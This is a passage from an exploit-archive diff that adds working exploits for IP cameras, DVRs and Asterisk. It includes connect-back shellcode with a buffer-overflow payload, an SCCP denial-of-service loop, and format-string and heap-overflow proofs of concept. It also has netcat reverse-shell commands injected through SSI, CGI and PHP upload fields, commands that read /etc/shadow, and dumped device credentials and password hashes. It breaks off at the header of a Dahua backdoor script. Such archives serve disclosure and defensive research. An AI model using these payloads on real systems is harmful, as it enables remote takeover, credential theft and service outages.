xscode = "01108fe211ff"
xscode += "2fe111a18a78013a8a700221081c0121921a0f02193701df061c0ba10223"
xscode += "0b801022023701df3e270137c821301c01df0139fbd507a0921ac27105b4"
xscode += "69460b2701df0121081c01dfc046ffff7a69c0a858642f62696e2f736858"
xscode += "ffffc046efbeadde"
h = lambda x: hex(int(x))[2:]
h2 = lambda x: h(x).zfill(2)
xscode = xscode[:164] + h(lport+0x100).zfill(4) + ''.join(map(h2, lhost.split('.'))) + xscode[176:]
xscode = xscode.decode('hex')
for badchar in badchars:
if badchar in xscode:
raise NameError('badchar %s in shellcode!' % hex(ord(badchar)))
return xscode
def restart_dvrapp(c):
with log.progress('restarting dvr application') as logp:
logp.status('looking up dvrhelper process')
c.sendline('ps')
cmdline = ''
while not 'dvrHelper' in cmdline:
cmdline = c.recvline()
cmdline = cmdline.split()
while not 'ps' in c.recvline():
pass
sleep(1)
logp.status('killing dvrhelper')
c.sendline('kill %s' % cmdline[0])
sleep(1)
cmdline_dvrhelper = ' '.join(cmdline[4:])
logp.status('starting dvrhelper: %s' % cmdline_dvrhelper)
c.sendline(cmdline_dvrhelper + ' 2>/dev/null &')
sleep(1)
c.recvuntil(sofia_cmdline)
c.recvline()
def upload_tools(c):
with log.progress('uploading tools to /var/.tools') as logp:
logp.status('creating dir')
c.sendline('rm -fr /var/.tools')
sleep(1)
c.sendline('mkdir /var/.tools')
sleep(1)
tools = ['dropbear']
upload_blocksize = 1024
for tool in tools:
toolsize = os.path.getsize('./tools/%s' % tool)
b = 0
fp = open("./tools/%s" % tool, "rb")
for chunk in iter(lambda: fp.read(upload_blocksize), ''):
chunkhex = ''.join(['\\x'+chunk.encode('hex')[i:i+2].zfill(2) for i in range(0, len(chunk)*2, 2)])
c.sendline("echo -n -e '%s' >> /var/.tools/%s" % (chunkhex, tool))
b += len(chunk)
logp.status('%s: %d/%d' % (tool, b, toolsize))
sleep(0.1)
fp.close()
c.sendline('chmod +x /var/.tools/%s' % tool)
sleep(1)
logp.success(' '.join(tools))
log.info('target is %s:%d' % (target_host, target_port))
if not args.nolisten:
log.info('connectback on %s:%d' % (listen_host, listen_port))
with log.progress("assembling shellcode") as logp:
xscode = shellcode(connectback_host, connectback_port)
logp.success("done. length is %d bytes" % len(xscode))
with log.progress("identifying model number") as logp:
modelnumber = getmodelnumber()
logp.success(modelnumber)
log.info('exploiting dir path traversal of web service to get leak addresses')
stack_section_base = getleak(findpid(), getleak_interactive)
stack_offset = args.offset
stack_20 = stack_section_base + stack_offset + 20
log.info('shellcode address is ' + hex(stack_20))
payload = "GET "
payload += xscode
payload += "a" * (299 - len(xscode))
payload += p32(stack_20)
payload += " HTTP"
log.info('exploiting buffer overflow in web service url path')
log.info('remote shell should gained by connectback shellcode!')
if not args.nolisten:
l = listen(bindaddr=listen_host, port=listen_port, timeout=5)
c = l.wait_for_connection()
r = remote(target_host, target_port)
r.sendline(payload)
r.recvall(timeout=5)
r.close()
if not args.nolisten:
if shell_persistent:
restart_dvrapp(c)
if shell_upload:
upload_tools(c)
c.interactive()

80
exploits/multiple/dos/43992.py Executable file
View file

@ -0,0 +1,80 @@
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
# CVE-2017-17090 - AST-2017-013
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
# The vulnerability is due to an error when the vulnerable application
# handles crafted SCCP packet. A remote attacker may be able to exploit
# this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
# helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000
import binascii
import sys
import socket
import time
def asteriskSCCP(target,port):
try:
while 1:
# Open socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set reuse ON
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind port
s.connect((target, port))
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ")
packet =
binascii.unhexlify(b'450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c')
# Log the packet in hexa and timestamp
fileLog = target + ".log"
logPacket = open(fileLog, "w+")
logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Packet sent: " + binascii.hexlify(bytes(packet))+"\n")
logPacket.close()
# Write bytecodes to socket
print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ")
s.send(bytes(packet))
# Packet sent:
print(bytes(packet))
try:
data = s.recv(4096)
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data))
except socket.error, e:
print 'Sorry, No data available'
continue
s.close()
except socket.error as error:
print error
print "Sorry, something went wrong!"
def howtouse():
print "Usage: AsteriskSCCP.py Hostname Port"
print "[*] Mandatory arguments:"
print "[-] Specify a hostname / port"
sys.exit(-1)
if __name__ == "__main__":
try:
# Set target
target = sys.argv[1]
port = int(sys.argv[2])
print "[*] Asterisk 13.17 Exploit by Juan Sacco <jsacco@exploitpack.com "
asteriskSCCP(target, port)
except IndexError:
howtouse()

123
exploits/multiple/dos/43998.txt Normal file
View file

@ -0,0 +1,123 @@
[STX]
Subject: Remote Stack Format String in 'nsd' binary from multiple OEM
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 14, 2017
Full Disclosure: 0-Day
-[ PoC ]-
1)
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'
[...]
function initHideWidget(){
document.getElementById("devip").value = "192.168.57.20";
document.getElementById("cameraid").value = 1;
document.getElementById("streamid").value = 1;
document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
document.getElementById("lg").value = "BBBB";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
document.getElementById("ismotorize").value = 1;
[...]
Note: 'BBBB' are hiding within '5e3006db'
2)
curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"
[...]
function initHideWidget(){
document.getElementById("ip").value = "192.168.57.20";
document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
document.getElementById("port").value = 60000;
document.getElementById("ipver").value = 1;
document.getElementById("tprotocol").value = 2;
document.getElementById("devtype").value = 1;
[...]
-[ Affected OEM ]-
Huatu
I-View
IP Camera Web Service
Stanley Security
3D Eyes CCTV Platform
Protech Srl
LS vision
GWSECU
12 Legion Solution
HDVuk IP Camera
Intervid Security
Suzuki Tech
Wellsite IP Camera
iBrido
Protec IP Camera
Maxtron IP Camera
Ascendent
GTvs IP Camera
Squilla
Bikal IP Camera
MW Power
Alfa Vision
KMA Security
Tough Dog Security
Kpro HQ
Lanetwork
AFM Vision
ZetaDo
Jobsight Inc.
Datalab IP Technologies
4Tvision
Proline UK
Tanz
Aisonic
HD-IP
PreSec Security Solution
EagleVision
Elemis Delta
Imenara
Gigamedia
Xavee
Honeywell
Boss Security
A.R.T Surveillance
Global Security
Securicorp
Securetech
Vapplica
Star
Stic
NeXus
Alnet
Spy Smart
Kompsos
Adler Security Systems
Nextan
Access
Toprotect
Kawah
LS StrateX
Senpei CCTV
Metcom
AFM Vision
Doron Technologies
Saviour Smart IoT Systems
Eagle-Eye
Faucon.at
BlueEagle Security
Campro
Opple
Level One
Video and Monitor System
K&D
[ETX]

28
exploits/multiple/remote/43984.txt Normal file
View file

@ -0,0 +1,28 @@
[STX]
Subject: SSI Remote Execute and Read Files
Researcher: bashis <mcw noemail eu> (August 2016)
Release date: October, 2017 (Old stuff that I've forgotten, fixed Q3/2016 by Axis)
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Conditions: The cam must be configure to allow anonymous view
Execute remote commands (PoC: Connect back shell):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%20<CONNECT BACK IP>%20<CONNECT BACK PORT>%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<CONNECT BACK IP> = LHOST IP
<CONNECT BACK PORT> = LHOST PORT
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT
Read remote files (PoC: Read /etc/shadow - check top of the returned output):
echo -en "GET /incl/image_test.shtml?camnbr=%3c%21--%23include%20virtual=%22../../etc/shadow%22%20--%3e HTTP/1.0\n\n" | ncat <TARGET IP> <TARGET PORT>
Notes:
<TARGET IP> = RHOST IP
<TARGET PORT> RHOST PORT
[ETX]

89
exploits/multiple/remote/43985.txt Normal file
View file

@ -0,0 +1,89 @@
[STX]
Subject: Axis Communications MPQT/PACS Heap Overflow and Information Leakage.
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (August 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 1, 2017
Full Disclosure: 90 days (due to the large volume of affected devices)
heap: Non-Executable + ASLR
stack: Non-Executable + ASLR
Axis Vulnerability ID: ACV-120444
Vulnerable: MPQT series < v7.20.x/6.50.1.2
Not vulnerable: MPQT series > v7.30/6.50.1.3 (Releases from September to November 2017)
Vulnerable: PACS series < v1.30.0.2/1.60.0/1.10.0.2/1.65.1
Not vulnerable (Releases from October to November 2017):
1. Information leak; All MPQT and PACS (Exist actually from v4.x Firmware)
2. Heap Overflow; MPQT and PACS with Apache Web Server (cannot be triggered with Boa Web Server)
[Note]
The best way to find a fixed FW is to check the Axis advisory and look for 'ACV-120444' in the release notes.
https://www.axis.com/global/en/support/firmware
https://www.axis.com/global/en/support/product-security
Timeline:
August 31, 2017: Initiated contact with Axis
September 1, 2017: Response from Axis
September 5, 2017: ACK of findings from Axis
September 9, 2017: Received first test image from Axis to verify fix
September 28, 2017: Received first advisory draft from Axis
November 15-27, 2017: Coordination with Axis for Full Disclosure
December 1, 2017: Full Disclosure
-[General Information]-
"CGI_decode" in /usr/lib/libcgiparser.so suffers from a bug in the handling URL decode of '%xx'.
The CGI_decode does not check the size of what it is about to decode, it always assumes "%" plus two chars.
By supplying only one single '%', 'CGI_decode' will try to URL decode [% + NULL + Next char], which lead to the return of a longer string than expected as the new string will be read until the next NULL. ([NULL string termination + Next char] are replaced with one '?')
-[Information leakage]-
The "%"" in "GET /index.shtml?size=%"" triggers both "information disclosure" and "heap overflow", depending on how it will be used.
[PoC] (see the breakpoint with the 'AAAA' in the 'Result')
$ echo -en "GET /index.shtml?size=AAAA% HTTP/1.0\n\n" | ncat -v 192.168.57.20 80
[Result]
...
var completePath = "imagepath=" + encodeURIComponent(imagepath) + "&size=AAAA?http_user=anonymous&http_remote_addr=192.168.57.1&http_remote_port=44019&http_port=80&http_scheme_addr=http://http&http_protocol=http&www_authenticate_header=WWW-Authenticate:%20Digest%20realm=%22_%22,%20nonce=%22pP/WaqNeBQA=884e58ea2563f69a14215a33ca02efa68eeca126%22,%20algorithm=MD5,%20qop=%22auth%22";
...
-[Heap Overflow]-
To trigger the heap overflow we need to send ~20KB amount of data that would normally not be accepted by the Web server.
The way around this is to use 'Referer:' and 'x-sessioncookie', where we can send max 8162 bytes in each of them.
[Note]
Without the information leakage bug above, the realloc() will never be triggered regardless how much data is sent.
[PoC]
$ echo -en "GET /index.shtml?size=% HTTP/1.0\nReferer: `for((i=0;i<8162;i++));do echo -en "\x22";done`\nx-sessioncookie: `for((i=0;i<2157;i++));do echo -en "\x22";done`\n\n" | ncat -v 192.168.57.20 80
[Result]
/var/log/info.log
2017-05-08T08:22:23.801+00:00 axis [ INFO ] ssid[3337]: *** Error in `/bin/ssid': realloc(): invalid next size: 0x00bfda50 ***
-[Vulnerable binaries]-
/bin/ssid (Server Side Include Daemon)
/bin/urldecode (URL Command Line Tool)
/usr/bin/dynamic_overlayd (Dynamic Overlay Daemon)
/usr/bin/wsd (Web Service Dispatch Daemon)
/usr/html/axis-cgi/param.cgi (VAPIX Parameter Management)
/usr/lib/libwsevent.so
/usr/lib/libcgiparser.so (<= with the vulnerable function 'CGI_decode()', used in above binaries)
Have a nice day
/bashis
[ETX]

34
exploits/multiple/remote/43999.txt Normal file
View file

@ -0,0 +1,34 @@
[STX]
Subject: Uniview RCE and export config PoC
Researcher: bashis <mcw noemail eu> (October 2017)
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
[Export config]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}
-[tcpdump]-
[check active capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":263,"szUserName":"","u32UserLoginHandle":-1}
[start capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":"eth0"}
[stop capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":0,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":"eth0"}
[download capture]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}
-[Remote Command Execution]-
[Get /etc/shadow]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":";cp%20/etc/shadow%20/tmp/packetcapture.pcap;"}
[get the result]
http://IP:PORT/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}
[ETX]

201
exploits/multiple/remote/44000.txt Normal file
View file

@ -0,0 +1,201 @@
[STX]
Subject: Vitek RCE and Information Disclosure (and possible other OEM)
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 22, 2017
Full Disclosure: 0-day
heap: Executable + Non-ASLR
stack: Executable + ASLR
-[Manufacture Logo]-
_ _ _ _ _ _ _ _ _ _ _ _
\ _ _ _ _ _ ___
/ /__/ \ |_/
/ __ / - _ ___
/ / / / / /
_ _ _ _/ / / \_/ \_ ______
___________\___\__________________
-[OEM (found in the code)]-
Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
Thrive
Wisecon
Sanyo
Inodic
CBC
Elbex
Y3K
KTNC
-[Stack Overflow RCE]-
[Reverse netcat shell]
$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81
[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:36356.
pwd
/opt/fw
whoami
root
exit
$
Note:
1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20
2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4]
3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0
H1:
VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001CD138 SUB R3, R11, #0x74
.text:001CD13C MOV R0, R3
.text:001CD140 BL system
H4:
VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:00114AC8 SUB R3, R11, #0x74
.text:00114ACC MOV R0, R3
.text:00114AD0 BL system
N1:
VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001E9F0C SUB R3, R11, #0x74
.text:001E9F10 MOV R0, R3
.text:001E9F14 BL system
-[PHP RCE]-
Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted)
[Reverse netcat shell (forking)]
$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST
200 OK
[...]
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody>
[...]
[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:52726.
pwd
/opt/www/htdocs/system
whoami
nobody
ls -l /mnt/usb2/
total 4
drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr
-rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
exit
$
-[Login / Password Disclosure]-
curl -v "http://192.168.57.20:80/menu.env" | hexdump -C
[binary config, login and password can be found for admin login and all connected cameras]
Admin l/p
[...]
00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................|
00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......|
000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12|
00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............|
00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
Cameras l/p
[...]
00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................|
00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........|
00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........|
00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................|
00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root|
00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass|
00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
-[Hardcode l/p]-
FTP: TCP/10021
TELNET: TCP/10023
/etc/passwd
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh
-[Korean hardcoded DNS]-
$ cat /etc/resolv.conf
nameserver 168.126.63.1
nameserver 0.0.0.0
nameserver 0.0.0.0
$
$ nslookup 168.126.63.1
1.63.126.168.in-addr.arpa name = kns.kornet.net.
$ nslookup 168.126.63.2
2.63.126.168.in-addr.arpa name = kns2.kornet.net.
-[Other Information Disclosure]-
curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
192,168,57,20
192,168,2,100
00:0A:2F:XX:XX:XX
00:0A:2F:YY:YY:YY
255.255.255.0
192.168.57.1
-[MAC Address Details]-
Company: Artnix Inc.
Address: Seoul 137-819, KOREA, REPUBLIC OF
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
Type: IEEE MA-L
curl -v "http://192.168.57.20:80/webviewer/gw.dat"
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0
curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
Change GUI Language to English
[... and more]
[ETX]

143
exploits/multiple/remote/44001.txt Normal file
View file

@ -0,0 +1,143 @@
[STX]
Subject: Vivotek IP Cameras - Remote Stack Overflow
Researcher: bashis <mcw noemail eu> (September-October 2017)
PoC: https://github.com/mcw0/PoC
Release date: November 13, 2017
Full Disclosure: 43 days
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Firmware Vulnerable: Only 2017 versions affected
Firmware Patched: October 2017 and higher
Device Model:
CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS,
FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA,
FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1,
FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379,
FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2,
FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377,
IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564,
MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more
Download Updated Firmware: http://www.vivotek.com/firmware/
[Timeline]
October 1, 2017: Reported findings with all details to Vivotek Cybersecurity
October 2, 2017: First response from Vivotek
October 5, 2017: ACK of findings from Vivotek
October 11, 2017: Vivotek reported first fixed Firmware
October 12, 2017: After request, Vivotek provided samples of fixed Firmware
October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help
October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory
November 1, 2017: Agreed on publication November 13, 2017
November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not.
November 13, 2017: No reply from Vivotek, Full Disclosure as planned.
[Details]
Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek.
The stack overflow is triggered by "PUT" or "POST" request:
[PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n
However,
the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack:
"[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request:
"[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
Notes:
1. B to I = $R4-$R11; X = $PC
2. Size of request availible in $R3 at the LDMFD
3. Max request size: 9182 bytes (0x1FFF)
4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx)
5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes
6. Stack not protected with "Stack canaries"
7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a;
8. heap: Non-executable + Non-ASLR
9. stack: Non-executable + ASLR
[PoC]
$ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80
(gdb) target remote 192.168.57.20:23946
Remote debugging using 192.168.57.20:23946
0x76eb2c5c in ?? ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) bt
#0 0x58585858 in ?? ()
#1 0x000188f4 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x1 1
r1 0x47210 291344
r2 0x0 0
r3 0x75 117
r4 0x42424242 1111638594
r5 0x43434343 1128481603
r6 0x44444444 1145324612
r7 0x45454545 1162167621
r8 0x46464646 1179010630
r9 0x47474747 1195853639
r10 0x48484848 1212696648
r11 0x49494949 1229539657
r12 0x1 1
sp 0x7e92dac0 0x7e92dac0
lr 0x188f4 100596
pc 0x58585858 0x58585858
cpsr 0x60000010 1610612752
(gdb)
$ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80
(gdb) target remote 192.168.57.20:23946
Remote debugging using 192.168.57.20:23946
0x76e82c5c in ?? ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) bt
#0 0x58585858 in ?? ()
#1 0x000188f4 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x1 1
r1 0x47210 291344
r2 0x0 0
r3 0x4f 79
r4 0x42424242 1111638594
r5 0x43434343 1128481603
r6 0x44444444 1145324612
r7 0x45454545 1162167621
r8 0x46464646 1179010630
r9 0x47474747 1195853639
r10 0x48484848 1212696648
r11 0x49494949 1229539657
r12 0x1 1
sp 0x7ec9cac0 0x7ec9cac0
lr 0x188f4 100596
pc 0x58585858 0x58585858
cpsr 0x60000010 1610612752
(gdb)
Have a nice day
/bashis
[ETX]

663
exploits/multiple/remote/44002.py Executable file
View file

@ -0,0 +1,663 @@
#!/usr/bin/python2.7
if False: '''
2017-05-03
Public rerelease of Dahua Backdoor PoC
https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
